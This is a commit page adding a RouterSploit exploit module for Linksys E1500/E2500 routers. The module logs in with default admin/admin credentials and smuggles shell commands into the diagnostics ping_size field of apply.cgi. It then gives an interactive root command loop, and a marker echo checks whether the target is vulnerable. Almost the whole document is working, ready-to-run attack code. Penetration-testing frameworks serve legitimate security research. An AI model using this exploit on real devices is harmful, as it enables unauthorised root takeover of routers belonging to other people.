Added module for Linksys 1500/2500

5cd5fd7c · Spartan · 879a8cb1 · 5cd5fd7c
Commit 5cd5fd7c authored Apr 11, 2016 by Spartan
Show whitespace changes
Inline Side-by-side

Showing with 71 additions and 0 deletions

1500_2500.py routersploit/modules/exploits/linksys/1500_2500.py +71 -0

No files found.
--- a/routersploit/modules/exploits/linksys/1500_2500.py
+++ b/routersploit/modules/exploits/linksys/1500_2500.py
+import requests
+import re
+
+from routersploit import *
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit for Linksys E1500 and E2500 devices Remote Code Execution vulnerability.
+    If the target is vulnerable, command loop is invoked that allows executing commands with root privileges.
+    """
+    __info__ = {
+        'name': 'Linksys 1500/2500',
+        'description': 'Module exploits remote command execution in Linksys E1500/E2500 devices. Diagnostics interface allows executing root privileged shell commands is available on dedicated web pages on the device.',
+        'authors': [
+            'Michael Messner', # vulnerability discovery
+            'Esteban Rodriguez (n00py)', # routersploit module
+        ],
+        'references': [
+            'https://www.exploit-db.com/exploits/24475/',
+            ""
+        ],
+        'targets': [
+            'Linksys E1500/E2500',
+        ]
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
+    port = exploits.Option(80, 'Target Port')
+
+    def run(self):
+        if self.check() == True:
+            print_success("Target is vulnerable")
+            print_status("Invoking command loop...")
+            self.command_loop()
+        else:
+            print_error("Target is not vulnerable")
+
+    def command_loop(self):
+        while 1:
+            cmd = raw_input("cmd > ")
+            print self.execute(cmd)
+
+    def execute(self, cmd):
+        url = sanitize_url("{}:{}/apply.cgi".format(self.target, self.port))
+        data = {"submit_button": "Diagnostics", "change_action":"gozila_cgi", "submit_type":"start_ping","action":"","commit":"0","ping_ip":"127.0.0.1","ping_size": "&" + cmd,"ping_times":"5","traceroute_ip":"127.0.0.1" }
+        try:
+            r = requests.post(url, data=data, auth=("admin", "admin"))
+        except requests.exceptions.MissingSchema:
+            return "Invalid URL format: %s" % url
+        except requests.exceptions.ConnectionError:
+            return "Connection error: %s" % url
+
+        return r.text.strip()
+
+    def check(self):
+        # meaby random mark should be implemented
+        cmd = "echo 9fdbd928b52c1ef61615a6fd2e8b49af"
+        url = sanitize_url("{}:{}/apply.cgi".format(self.target, self.port))
+        data = {"submit_button": "Diagnostics", "change_action":"gozila_cgi", "submit_type":"start_ping","action":"","commit":"0","ping_ip":"127.0.0.1","ping_size": "&" + cmd,"ping_times":"5","traceroute_ip":"127.0.0.1" }
+
+        try:
+            r = requests.post(url, data=data, auth=("admin", "admin"))
+            res = r.text
+        except:
+            return None # could not be verified
+
+        if "9fdbd928b52c1ef61615a6fd2e8b49af" in res:
+            return True
+
+        return False